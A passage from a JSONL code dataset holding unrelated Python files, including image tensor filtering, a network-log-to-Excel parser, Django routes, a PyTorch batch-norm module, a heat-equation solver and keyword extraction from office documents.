img.shape[2], 3, 3)\n w, v = np.linalg.eigh(tensor)\n del tensor\n sume = w.sum(axis=-1)\n nvox = img.shape[0] * img.shape[1] * img.shape[2]\n sortidx = np.argsort(np.abs(w), axis=-1)\n sortidx = sortidx.reshape((nvox, 3))\n\n # Sort eigenvalues according to their abs\n w = w.reshape((nvox, 3))\n for j, (idx, value) in enumerate(zip(sortidx, w)):\n w[j,:] = 
value[idx]\n w = w.reshape(img.shape[0], img.shape[1], img.shape[2], 3)\n\n # Sort eigenvectors according to their abs\n v = v.reshape((nvox, 3, 3))\n for j, (idx, vec) in enumerate(zip(sortidx, v)):\n v[j,:,:] = vec[:, idx]\n del sortidx\n v = v.reshape(img.shape[0], img.shape[1], img.shape[2], 3, 3)\n\n mine = w[:,:,:, 0]\n mide = w[:,:,:, 1]\n maxe = w[:,:,:, 2]\n\n if rsptype == 'oof':\n feat = maxe\n elif rsptype == 'bg':\n feat = -mide / maxe * (mide + maxe) # Medialness measure response\n cond = sume >= 0\n feat[cond] = 0 # Filter the non-anisotropic voxels\n\n del mine\n del maxe\n del mide\n del sume\n\n cond = np.abs(feat) > np.abs(rsp)\n W[cond, :] = w[cond, :]\n V[cond, :, :] = v[cond, :, :]\n rsp[cond] = feat[cond]\n del v\n del w\n del tensorfield\n del feat\n del cond\n # pbar.update(1)\n # print('rsp value',np.max(rsp),np.min(rsp))\n\n return rsp, V, W\n\n\n\ndef ooftensor(img, radii, memory_save=True):\n '''\n type: oof, bg\n '''\n # sigma = 1 # TODO: Pixel spacing\n eps = 1e-12\n # ntype = 1 # The type of normalisation\n fimg = fftn(img, overwrite_x=True)\n shiftmat = ifftshiftedcoormatrix(fimg.shape)\n x, y, z = shiftmat\n x = x / fimg.shape[0]\n y = y / fimg.shape[1]\n z = z / fimg.shape[2]\n kernel_radius = np.sqrt(x ** 2 + y ** 2 + z ** 2) + eps # The distance from origin\n\n for r in radii:\n # Make the fourier convolutional kernel\n jvbuffer = oofftkernel(kernel_radius, r) * fimg\n\n if memory_save:\n # F11\n buffer = ifftshiftedcoordinate(img.shape, 0) ** 2 * x * x * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f11 = buffer.copy()\n\n # F12\n buffer = ifftshiftedcoordinate(img.shape, 0) * ifftshiftedcoordinate(img.shape, 1) * x * y * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f12 = buffer.copy()\n\n # F13\n buffer = ifftshiftedcoordinate(img.shape, 0) * ifftshiftedcoordinate(img.shape, 2) * x * z * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f13 = buffer.copy()\n\n # F22\n buffer = ifftshiftedcoordinate(img.shape, 1) ** 2 * y ** 2 * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f22 = buffer.copy()\n\n # F23\n buffer = ifftshiftedcoordinate(img.shape, 1) * ifftshiftedcoordinate(img.shape, 2) * y * z * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f23 = buffer.copy()\n\n # F33\n buffer = ifftshiftedcoordinate(img.shape, 2) * ifftshiftedcoordinate(img.shape, 2) * z * z * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f33 = buffer.copy()\n else:\n f11 = np.real(ifftn(x * x * jvbuffer))\n f12 = np.real(ifftn(x * y * jvbuffer))\n f13 = np.real(ifftn(x * z * jvbuffer))\n f22 = np.real(ifftn(y * y * jvbuffer))\n f23 = np.real(ifftn(y * z * jvbuffer))\n f33 = np.real(ifftn(z * z * jvbuffer))\n yield [f11, f12, f13, f22, f23, f33]\n\ndef ifftshiftedcoormatrix(shape):\n shape = np.asarray(shape)\n p = np.floor(np.asarray(shape) / 2).astype('int')\n coord = []\n for i in range(shape.size):\n a = np.hstack((np.arange(p[i], shape[i]), np.arange(0, p[i]))) - p[i] - 1.\n repmatpara = np.ones((shape.size,)).astype('int')\n repmatpara[i] = shape[i]\n A = a.reshape(repmatpara)\n repmatpara = shape.copy()\n repmatpara[i] = 1\n coord.append(np.tile(A, repmatpara))\n\n return coord\n\n\ndef ifftshiftedcoordinate(shape, 
axis):\n shape = np.asarray(shape)\n p = np.floor(np.asarray(shape) / 2).astype('int')\n a = (np.hstack((np.arange(p[axis], shape[axis]), np.arange(0, p[axis]))) - p[axis] - 1.).astype('float')\n a /= shape[axis].astype('float')\n reshapepara = np.ones((shape.size,)).astype('int');\n reshapepara[axis] = shape[axis];\n A = a.reshape(reshapepara);\n repmatpara = shape.copy();\n repmatpara[axis] = 1;\n return np.tile(A, repmatpara)\n\ndef oofftkernel(kernel_radius, r, sigma=1, ntype=1):\n eps = 1e-12\n normalisation = 4/3 * np.pi * r**3 / (jv(1.5, 2*np.pi*r*eps) / eps ** (3/2)) / r**2 * \\\n (r / np.sqrt(2.*r*sigma - sigma**2)) ** ntype\n jvbuffer = normalisation * np.exp( (-2 * sigma**2 * np.pi**2 * kernel_radius**2) / (kernel_radius**(3/2) ))\n return (np.sin(2 * np.pi * r * kernel_radius) / (2 * np.pi * r * kernel_radius) - np.cos(2 * np.pi * r * kernel_radius)) * \\\n jvbuffer * np.sqrt( 1./ (np.pi**2 * r *kernel_radius ))\n\n","sub_path":"exhaustive_tracing.py","file_name":"exhaustive_tracing.py","file_ext":"py","file_size_in_byte":20237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"185326344","text":"def min_max(arr):\n min=arr[0]\n max=arr[0]\n sum=0\n l=len(arr)\n for x in range(l):\n if min > arr[x]:\n min=arr[x]\n if max < arr[x]:\n max=arr[x]\n sum=sum+arr[x]\n temp=max\n max=sum-min\n min=sum-temp\n print(max,' ',min)\nmin_max([1,2,3,4,5])","sub_path":"problem1/problem13.py","file_name":"problem13.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"608910511","text":"# coding=utf-8\r\nimport os\r\nclass MDFileSplitter:\r\n\r\n def __init__(self, s):\r\n self.path = s\r\n self.file = open(s)\r\n self.article_summary = \"\"\r\n self.splitter()\r\n\r\n def splitter(self):\r\n url = os.path.basename(self.path)\r\n title = self.file.readline().replace(' ', '').replace('\\'', '').replace('title:', '').strip() # title\r\n time_in = map(lambda x: x.strip(), str(self.file.readline()).split(' ')) # time\r\n time_str = time_in[1] + ' ' + time_in[2]\r\n categories = self.file.readline().replace(' ', '').replace('categories:', '') # categories\r\n # skip article splitter\r\n self.file.readline()\r\n # contents\r\n content = self.file.read()\r\n\r\n # summary\r\n self.article_summary = {'url': url, 'title': title, 'TimeStr': time_str, 'Categories': categories,\r\n 'Content': content}\r\n\r\n def get_info(self):\r\n return self.article_summary\r\n","sub_path":"mdfilesplitter.py","file_name":"mdfilesplitter.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"479738392","text":"import sys\n\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\n\nargs = sys.argv\n\ntrial_file = args[1]\nscore_file = args[2]\nsave_file = args[3]\n\ntgt_scores = []\nnontgt_scores = []\n\nwith open(trial_file, 'r') as tf, open(score_file, 'r') as sf:\n tf_lines = tf.read().splitlines()\n trial_types = [x.split()[2] for x in tf_lines]\n sf_lines = sf.read().splitlines()\n scores = [float(x.split()[2]) for x in sf_lines]\n\n for ttype, score in zip(trial_types, scores):\n if ttype == \"target\":\n tgt_scores.append(score)\n else:\n nontgt_scores.append(score)\n\ntgt_scores = sorted(tgt_scores)\nnontgt_scores = sorted(nontgt_scores)\n\nfit_tgt = stats.norm.pdf(tgt_scores, np.mean(tgt_scores), 
np.std(tgt_scores))\nfit_nontgt = stats.norm.pdf(nontgt_scores, np.mean(nontgt_scores), np.std(nontgt_scores))\n\nplt.plot(tgt_scores, fit_tgt, '-g')\nplt.hist(tgt_scores, bins=20, normed=True)\n\nplt.plot(nontgt_scores, fit_nontgt, '-r')\nplt.hist(nontgt_scores, bins=20, normed=True)\n\nsp = save_file.split('_')\nif len(sp) > 9:\n title = \"PPG type = \"+sp[-9]\n title = title+\", Rand level = \"+sp[-7]\n title = title+\", Cross-gender =\"+sp[-5]\n title = title+\", Distance = \"+sp[-3]\n title = title+\", Proximity = \"+sp[-1]\n plt.title(title+'.')\n\nplt.savefig(save_file, dpi=300)\n\n\n","sub_path":"egs/voice_privacy/v1/local/plot/plot_trial_score_dist.py","file_name":"plot_trial_score_dist.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"242958784","text":"#!python3\n# coding:utf-8\n\n'''\nscreen-length 0 temporary\ndisplay interface brief main\ndisplay interface description | exclude \\.\ndisplay lldp neighbor\n'''\n\n'''\n['Interface', 'PHY', 'Protocol', 'InUti', 'OutUti', 'inErrors', 'outErrors']\n['Interface', 'PHY', 'Protocol', 'Description']\n['Local Intf', 'Neighbor Dev', 'Neighbor Intf', 'Exptime (sec)']\n'''\n\n'''\n取消屏幕显示长度\n获取 聚合组 与 物理口 的关系、获取 物理up/down\n获取 端口描述\n获取 对端实际设备信息\n'''\n\n\nfrom datetime import datetime\nimport platform\nfrom colorama import Fore, Back, Style, init\nimport pandas as pd\nfrom pathlib import Path\nimport re\n_version = '1.0'\n\n'''\n# ChangeLog\n\n### v1.0 (2021-09-30) \n\n- 根据采集信息整理输出\n'''\n\ninit(autoreset=True)\nif platform.system() == 'Windows':\n init(wrap=True)\nfile_names = Path().rglob('*.log')\ncontents = []\nfor file in file_names:\n if file == 'AutoRun.log':\n continue\n if '\\\\' in str(file):\n continue\n try:\n with open(file, encoding='utf-8') as f:\n contents.append(f.read().splitlines())\n except:\n ...\n\nrecord_list = ['Interface PHY Protocol InUti OutUti inErrors outErrors',\n 'Interface PHY Protocol Description ',\n 'Local Intf Neighbor Dev Neighbor Intf Exptime (sec)'\n ]\nflag_list = [['Interface', 'PHY', 'Protocol', 'InUti', 'OutUti', 'inErrors', 'outErrors'],\n ['Interface', 'PHY', 'Protocol', 'Description', ''],\n ['Local', 'Intf', 'Neighbor', 'Dev', 'Neighbor', 'Intf', 'Exptime', '(sec)']]\nflag_list = [['Interface', 'PHY', 'Protocol', 'InUti'],\n ['Interface', 'PHY', 'Protocol', 'Description'],\n ['Local', 'Intf', 'Neighbor', 'Dev']]\nflag_key = ['flag_interface_brief',\n 'flag_interface_desc',\n 'flag_lldp_neighbor']\n\n\ndef get_device_name(content=[]) -> str:\n '''\n 获取设备名\n '''\n device_name = ''\n len_content = len(content)\n i = 0\n while True:\n r_match_name = re.search(r'<(.+[ME60|CMNET\\-SW].+)>', content[i])\n if r_match_name != None:\n device_name = r_match_name.group(1)\n return device_name\n elif i < len_content:\n i += 1\n else:\n print('No device name was found! 
Abort program.')\n return ''\n\n\ndef get_device_nick_name(device_name='') -> str:\n '''\n 获取设备别名\n '''\n return re.search(r'BAS[0-9]+', device_name).group(0)\n\n\ndef get_start_index(content=[], flag=[]) -> int:\n '''\n 定位数据采集起始点\n '''\n for index, value in enumerate(content):\n _list = re.split(r' +', value)\n if _list[:4] == flag:\n return index + 1\n return False\n\n\ndef get_interfaces(content=[]) -> list:\n '''\n 获取 聚合组 端口信息、up/down、\n 当前匹配 ME60\n '''\n\n def _get_frame_slot(port):\n r = re.search(r'([0-9]+)/([0-9]+)', port)\n frame = r.group(1)\n solt = r.group(2)\n return frame, solt\n\n # 定位数据采集起始点\n _start = get_start_index(content, flag_list[0])\n if not _start:\n print('无法定位数据采集点', 'get_interfaces')\n return []\n device_name = get_device_name(content)\n interfaces = []\n for value in content[_start:]:\n # 定位数据采集结束点\n if device_name in value:\n break\n _list = re.split(r' +', value)\n if _list[0][:9] == 'Eth-Trunk':\n _trunk = _list[0]\n phy = '{}-{}'.format(_list[1], _list[2])\n interfaces.append([device_name, '-', '-', _trunk, _trunk, phy])\n elif _list[0] == '':\n port = _list[1]\n frame, solt = _get_frame_slot(port)\n phy = '{}-{}'.format(_list[2], _list[3])\n interfaces.append([device_name, frame, solt, port, _trunk, phy])\n elif 'Ethernet' in _list[0]:\n port = _list[0]\n frame, solt = _get_frame_slot(port)\n phy = '{}-{}'.format(_list[1], _list[2])\n interfaces.append([device_name, frame, solt, port, '-', phy])\n else:\n continue\n\n return interfaces\n\n\ndef get_desc(content=[]) -> list:\n '''\n 获取端口描述\n '''\n # 定位数据采集起始点\n _start = get_start_index(content, flag_list[1])\n if not _start:\n print('无法定位数据采集点', 'get_desc')\n return []\n device_name = get_device_name(content)\n desc = []\n for value in content[_start:]:\n # 定位数据采集结束点\n r = re.search(device_name, value)\n if r and r.start() < 3:\n break\n _list = re.split(r' +', value)\n port = _list[0]\n if 'GE' in port:\n if '100GE' not in port:\n port = port.replace('GE', 'GigabitEthernet')\n elif not 'Eth-Trunk' in port:\n continue\n description = ''.join(_list[3:])\n # print(device_name, 'port', Fore.GREEN+port)\n # print('description', Fore.GREEN+description)\n desc.append([port, description])\n return desc\n\n\ndef get_lldp(content=[]) -> list:\n '''\n 获取 lldp 信息\n '''\n # 定位数据采集起始点\n # _start = get_start_index(content, flag_list[2])\n _start = False\n for index, value in enumerate(content):\n _list = re.split(r' +', value)\n if len(_list) == 4 and _list[1] == 'has' and _list[3][:8] == 'neighbor':\n _start = index\n break\n if not _start:\n print('无法定位数据采集点', 'get_lldp')\n return []\n device_name = get_device_name(content)\n lldp = []\n for value in content[_start:]:\n # 定位数据采集结束点\n # if re.search(r'[<\\[][~\\*]?'+device_name+'.+', value):\n # break\n r = re.search(device_name, value)\n if r and r.start() < 3:\n break\n _list = re.split(r' +', value)\n # print(\"_list:\", Fore.BLUE+str(_list))\n # lldp.append([_list[0], _list[1], _list[2]])\n if len(_list) == 4 and _list[1] == 'has' and _list[3][:8] == 'neighbor':\n port2 = _list[0]\n # print('port2', Back.BLUE+port2)\n elif value[:9] == 'Port ID ':\n lldp_port = _list[2][1:]\n # print('Port ID',Fore.GREEN+lldp_port)\n elif value[:18] == 'Port description ':\n lldp_desc = ''.join(_list[2:])[1:]\n # print('System description',Fore.GREEN+lldp_desc)\n elif value[:13] == 'System name ':\n lldp_device = _list[2][1:]\n # print('System name',Fore.GREEN+lldp_device)\n lldp.append([port2, lldp_desc, lldp_device, lldp_port])\n elif _list[0] == 'PortId:':\n lldp_port = 
_list[1]\n # print('PortId:',Fore.BLUE+lldp_port)\n elif _list[0] == 'PortDesc:':\n lldp_desc = ''.join(_list[1:])\n # print('SysDesc',Fore.BLUE+lldp_desc)\n elif _list[0] == 'SysName:':\n lldp_device = _list[1]\n # print('SysName',Fore.BLUE+lldp_device)\n lldp.append([port2, lldp_desc, lldp_device, lldp_port])\n return lldp\n\n\ndatas = pd.DataFrame()\nfor content in contents:\n # try:\n interfaces = get_interfaces(content)\n # print(interfaces)\n desc = get_desc(content)\n # print(desc)\n lldp = get_lldp(content)\n # print(lldp)\n df_interface = pd.DataFrame(\n interfaces, columns=['设备名', '框', '槽', '端口', '所属聚合组', '状态'])\n df_desc = pd.DataFrame(desc, columns=['端口', '描述'])\n df_lldp = pd.DataFrame(\n lldp, columns=['port2', 'LLDP描述', 'LLDP对端设备', 'LLDP对端端口'])\n # ['列1'] 为辅助列,用于其他表格 vlookup\n df_interface['列1'] = (df_interface['设备名']+\"-\"+df_interface['端口']\n ).map(lambda port: port.replace('(10G)', '').replace('XG', 'G'))\n data = df_interface.merge(df_desc, how='left', on='端口').fillna('')\n data['port2'] = data['端口'].map(\n lambda port: port.replace('(10G)', '').replace('(100G)', ''))\n data = data.merge(df_lldp, how='left', on='port2').fillna('')\n data.drop('port2', axis=1, inplace=True)\n datas = datas.append(data, ignore_index=True)\n # except Exception as err:\n # print(Back.RED+str(err))\n\ndatas.sort_values(by=['设备名', '框', '槽'], inplace=True)\ntry:\n writer = pd.ExcelWriter('output.{}.xlsx'.format(\n datetime.now().strftime(\"%Y-%m-%d.%H_%M_%S\")))\n datas.to_excel(writer, index=False)\n writer.save()\nexcept Exception as err:\n print(Back.RED+str(err))\n","sub_path":"cmnet_interface_trunk.py","file_name":"cmnet_interface_trunk.py","file_ext":"py","file_size_in_byte":8691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"73631202","text":"from django.urls import path\n\nfrom home import views\nurlpatterns = [\n path(\"\",views.home,name=\"home\"),\n path(\"index\",views.index,name=\"index\"),\n path(\"blog/\",views.blog,name=\"blog\"),\n path(\"blogpost/\",views.blogpost,name=\"home\"),\n path(\"contact\",views.contact,name=\"contact\"),\n path(\"search\",views.search,name=\"search\")\n \n]\n ","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"13400386","text":"\ncar_status = 'stop'\nprint('Hello, welcome to Car Game, you may input \"help\" to check out how '\n 'to play')\nwhile True:\n userinput = input('>')\n userinput = userinput.lower()\n if(userinput == 'help'):\n print('''\n Start - start the car\n Stop - stop the car\n Quit - quit this gamn\n help - show this message\n ''')\n elif(userinput == 'start'):\n if(car_status == 'stop'):\n print(' The car is ready .... 
set ....Go!')\n            car_status = 'start'\n        else:\n            print(' The car had started already')\n    elif(userinput == 'stop'):\n        if(car_status == 'start'):\n            print(' Alright, the car stops now')\n            car_status = 'stop'\n        else:\n            print(' The car had stopped already')\n    elif(userinput == 'quit'):\n        print(' Bye~ ')\n        break\n    else:\n        print(\" Sorry, I don't understand.\")\n","sub_path":"Scripts/practise/cargame.py","file_name":"cargame.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"131182934","text":"import logging\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n__all__ = [\n    \"FrozenBatchNorm2d\",\n    \"L2Norm\",\n    \"get_norm\",\n]\n\n\nclass FrozenBatchNorm2d(nn.Module):\n    _version = 3\n\n    def __init__(self, num_features, eps=1e-5):\n        super().__init__()\n\n        self.num_features = num_features\n        self.eps = eps\n        self.register_buffer(\"weight\", torch.ones(num_features))\n        self.register_buffer(\"bias\", torch.zeros(num_features))\n        self.register_buffer(\"running_mean\", torch.zeros(num_features))\n        self.register_buffer(\"running_var\", torch.ones(num_features) - eps)\n\n    def forward(self, x):\n        if x.requires_grad:\n            scale = self.weight * (self.running_var + self.eps).rsqrt()\n            bias = self.bias - self.running_mean * scale\n            scale = scale.reshape(1, -1, 1, 1)\n            bias = bias.reshape(1, -1, 1, 1)\n            return x * scale + bias\n        else:\n            return F.batch_norm(\n                x,\n                self.running_mean,\n                self.running_var,\n                self.weight,\n                self.bias,\n                training=False,\n                eps=self.eps,\n            )\n\n    def _load_from_state_dict(\n        self,\n        state_dict,\n        prefix,\n        local_metadata,\n        strict,\n        missing_keys,\n        unexpected_keys,\n        error_msgs\n    ):\n        version = local_metadata.get(\"version\", None)\n\n        if version is None or version < 2:\n            if prefix + \"running_mean\" not in state_dict:\n                state_dict[prefix + \"running_mean\"] = torch.zeros_like(self.running_mean)\n            if prefix + \"running_var\" not in state_dict:\n                state_dict[prefix + \"running_var\"] = torch.ones_like(self.running_var)\n\n        if version is not None and version < 3:\n            logger = logging.getLogger(__name__)\n            logger.info(\"FrozenBatchNorm {} is upgraded to version 3.\".format(prefix.rstrip(\".\")))\n            state_dict[prefix + \"running_var\"] -= self.eps\n\n        super()._load_from_state_dict(\n            state_dict,\n            prefix,\n            local_metadata,\n            strict,\n            missing_keys,\n            unexpected_keys,\n            error_msgs\n        )\n\n    def __repr__(self):\n        return f\"FrozenBatchNorm2d(num_features={self.num_features}, eps={self.eps})\"\n\n    @classmethod\n    def convert_frozen_batchnorm(cls, module):\n        bn_module = nn.modules.batchnorm\n        bn_module = (bn_module.BatchNorm2d, bn_module.SyncBatchNorm)\n        res = module\n        if isinstance(module, bn_module):\n            res = cls(module.num_features)\n            if module.affine:\n                res.weight.data = module.weight.data.clone().detach()\n                res.bias.data = module.bias.data.clone().detach()\n            res.running_mean.data = module.running_mean.data\n            res.running_var.data = module.running_var.data\n            res.eps = module.eps\n        else:\n            for name, child in module.named_children():\n                new_child = cls.convert_frozen_batchnorm(child)\n                if new_child is not child:\n                    res.add_module(name, new_child)\n        return res\n\n\nclass L2Norm(nn.Module):\n    def __init__(self, n_dims, scale=20.0, eps=1e-10):\n        super().__init__()\n\n        self.n_dims = n_dims\n        self.weight = nn.Parameter(torch.Tensor(self.n_dims))\n        self.eps = eps\n\n        nn.init.constant_(self.weight, scale)\n\n    def forward(self, x):\n        x_float = x.float()\n        norm = x_float.pow(2).sum(1, keepdim=True).sqrt() + 
self.eps\n return (self.weight[None, :, None, None].float().expand_as(x_float) * x_float / norm).type_as(x)\n\n\ndef get_norm(norm, out_channels, **kwargs):\n if isinstance(norm, str):\n if len(norm) == 0:\n return None\n eps = kwargs.get(\"eps\", 1e-5)\n momentum = kwargs.get(\"momentum\", 0.1)\n affine = kwargs.get(\"affine\", True)\n track_running_stats = kwargs.get(\"track_running_stats\", True)\n norm = {\n \"BN\": lambda x: nn.BatchNorm2d(x, eps, momentum, affine, track_running_stats),\n \"GN\": lambda x: nn.GroupNorm(32, x, eps, affine),\n \"FrozenBN\": lambda x: FrozenBatchNorm2d(x, eps),\n }[norm]\n return norm(out_channels)\n","sub_path":"tkdet/layers/batch_norm.py","file_name":"batch_norm.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16078538","text":"import bisect\nimport sys\n\nhaystack=[1,4,5,6,8,12,15,20,21,23,23,26,29,30]\nneedeles=[0,1,2,5,8,10,22,23,29,30,31]\n\nrow_fmt='{0:2d} @ {1:2d} {2}{0:<2d}'\n\ndef demo(bisect_fn):\n for needle in reversed(needeles):\n position=bisect_fn(haystack,needle)\n offset=position*' |'\n print(row_fmt.format(needle,position,offset))\n \n#if __name__=='__main__':\n# if sys.argv[-1]=='left':\n# bisect_fn=bisect.bisect_left#如果相等会被放置到相等元素的前面\n# else:\n# bisect_fn=bisect.bisect#否则默认放置到相等元素后面\n# print('demo:',bisect_fn.__name__)\n# print('haystack ->',' '.join('%2d' % n for n in haystack))\n# demo(bisect_fn)\n\ndef grade(score,breakpoints=[60,70,80,90],grades='FDCBA'):\n i=bisect.bisect(breakpoints,score)#二分查找,查找之前必须保证是有序序列\n return grades[i]\n\nprint([grade(score) for score in [33,99,77,70,89,90,100]])","sub_path":"pythonproject/流畅的python/第二章--序列构成的数组/2.8.1用bitsect来搜索.py","file_name":"2.8.1用bitsect来搜索.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164240716","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 11 15:49:31 2019\n\n@author: Arvid\n\"\"\"\nfrom scipy import *\nfrom numpy import *\nfrom matplotlib.pyplot import *\nfrom scipy.linalg import lu_factor, lu_solve\n\nfrom Problem import Problem\n\n\nclass smallRoomHeatSolver():\n \n def __init__(self, interface_dir, interface_vals, problem, room):\n # geom=(1,1), heater=40, normal_wall=15):\n #super().__init__(problem)\n \n self.interface_dir = interface_dir\n self.interface_vals = interface_vals\n #Change with global geometry\n self.x_len = problem.geometry[room][0]\n self.y_len = problem.geometry[room][1]\n self.dx = problem.dx\n self.heater = problem.heater\n self.normal_wall = problem.wall\n self.n_rows = round(self.x_len/self.dx) -1 # Defines the number of rows in the coordinate mesh.\n self.n_cols = round(self.y_len/self.dx) # Defines the number of columns in the coordinate mesh. 
\n self.size = (self.n_rows, self.n_cols)\n self.N_elements = self.n_rows*self.n_cols # Number of points in which to calculate u \n BC, neu_ind = self._make_boundaries()\n self.BC = BC\n self.neu_ind = neu_ind\n self.A = self._make_matrix()\n lu, piv = lu_factor(self.A)\n self.lu = lu\n self.piv = piv\n self.solution = None\n \n def _make_boundaries(self):\n \n BC_W = zeros(self.size)\n BC_E = zeros(self.size)\n BC_N = zeros(self.size)\n BC_S = zeros(self.size)\n BC_N[0,0:] = self.normal_wall\n BC_S[-1,0:] = self.normal_wall\n \n if self.interface_dir == 'west':\n BC_E[:,-1] = self.heater/(self.dx**2)\n BC_W[:,0] = self.interface_vals/self.dx\n neumann_ind = nonzero(BC_W.reshape(self.N_elements))\n elif self.interface_dir == 'east':\n BC_E[:,-1] = self.interface_vals/self.dx\n BC_W[:,0] = self.heater/self.dx**2\n neumann_ind = nonzero(BC_E.reshape(self.N_elements))\n BC_tot = BC_W + BC_E + BC_N/self.dx**2 + BC_S/self.dx**2\n \n BC_tot = BC_tot.reshape(self.size[0]*self.size[1])\n return BC_tot, neumann_ind\n \n def _update_boundaries(self, interface_vals):\n self.interface_vals = interface_vals\n BC, neu = self._make_boundaries()\n self.BC = -BC\n \n def _make_matrix(self):\n A = (diag(-4*ones(self.N_elements))\n + diag(ones(self.N_elements-1), -1)\n + diag(ones(self.N_elements-1), 1)\n + diag(ones(self.N_elements-self.n_cols), self.n_cols)\n + diag(ones(self.N_elements-self.n_cols), -self.n_cols))\n for ind in self.neu_ind:\n A[ind,ind] = -3\n \n for i in range(self.n_cols-1, self.N_elements-1, self.n_cols):\n A[i, i+1] = 0\n for i in range(self.n_cols, self.N_elements-1, self.n_cols):\n A[i,i-1] = 0\n return A*(1/self.dx**2)\n \n def solve_system(self, interface_vals):\n self._update_boundaries(interface_vals)\n u = lu_solve((self.lu, self.piv), self.BC)\n mesh_vals = u.reshape(self.n_rows,self.n_cols)\n if self.interface_dir == 'east':\n interface_vals = mesh_vals[:,-1]\n elif self.interface_dir == 'west':\n interface_vals = mesh_vals[:,0]\n self.solution = u \n return u, interface_vals\n \n def getMatrix(self):\n room = zeros((self.n_rows+2, self.n_cols+1))\n if self.interface_dir == 'east':\n room[1:-1,0:-1] = flip(self.solution.reshape(self.size)) #Might have flipped to much heh (mirror flip?)\n room[0, :] = self.normal_wall*ones(self.n_cols+1)\n room[:, -1] = self.heater*ones(self.n_rows+2)\n room[-1, :] = self.normal_wall*ones(self.n_cols+1) \n elif self.interface_dir == 'west':\n room[1:-1, 1:] = flip(self.solution.reshape(self.size)) #Might have flipped to much heh (mirror flip?)\n room[0,:] = room[-1,:] = self.normal_wall*ones(self.n_cols+1)\n room[:, 0] = self.heater*ones(self.n_rows+2)\n print('Complete room is: {}'.format(room))\n return room\n \n \nif __name__ == '__main__':\n p = Problem(1/4)\n print(p.geometry)\n interface_vals = array([20,20,20])\n s = smallRoomHeatSolver('east', interface_vals, p, 'room1')\n #BC, neumann_ind = s._make_boundaries()\n A=s._make_matrix()\n s.solve_system(interface_vals)\n print(s.getMatrix())\n ","sub_path":"Project3/Arvid/smallRoomHeatSolver.py","file_name":"smallRoomHeatSolver.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"150032955","text":"# -*- coding: utf-8 -*- \nfrom tika import parser\nfrom pptx import Presentation\nimport olefile\nimport docx2txt\nfrom krwordrank.hangle import normalize\nfrom krwordrank.word import KRWordRank\n\n\n# pdf to txt\ndef pdf_to_txt(path):\n pdf_path = path\n raw_pdf = parser.from_file(pdf_path) \n 
result = raw_pdf['content'] \n    result = result.strip()\n    #print(result)\n    return result\n\n\n# ppt to txt ---> 리스트에 txt 박스 단위로 반환 \ndef ppt_to_txt(path):\n    ppt_path = Presentation(path)\n    result = []\n    for slide in ppt_path.slides:\n        for shape in slide.shapes:\n            if not shape.has_text_frame:\n                continue\n            for paragraph in shape.text_frame.paragraphs:\n                result.append(paragraph.text)\n    #print(result)\n    return result\n\n\n# hwp to txt ---> Prvtxt만 가능\n# https://luji.tistory.com/18\ndef hwp_to_txt(path):\n    hwp_file = olefile.OleFileIO(path)\n    hwp_txt = hwp_file.openstream('Prvtext').read()\n    result = hwp_txt.decode('UTF-16')\n    #print (result)\n    return result\n\n\n# word to txt\ndef word_to_txt(path):\n    result = docx2txt.process(path)\n    #print(result)\n    return result\n\n\n# keyword extraction from txt\n# https://lovit.github.io/nlp/2018/04/16/krwordrank/ \n\ndef keyword_extraction(path):\n    with open(path, 'r') as f:\n        list_file = []\n        for line in f:\n            list_file.append(line)\n\n    texts = list_file\n    texts = [normalize(text, english=True, number=True) for text in texts]\n\n    wordrank_extractor = KRWordRank(\n        min_count = 5, # 단어의 최소 출현 빈도수 (그래프 생성 시)\n        max_length = 10, # 단어의 최대 길이\n        verbose = True\n        )\n\n    beta = 0.85 # PageRank의 decaying factor beta\n    max_iter = 10\n\n    keywords, rank, graph = wordrank_extractor.extract(texts, beta, max_iter)\n\n    for word, r in sorted(keywords.items(), key=lambda x:x[1], reverse=True)[:5]: \n        print('%s' % (word))\n        #print('%8s:\\t%.4f' % (word, r))","sub_path":"keyword extraction/read_file.py","file_name":"read_file.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
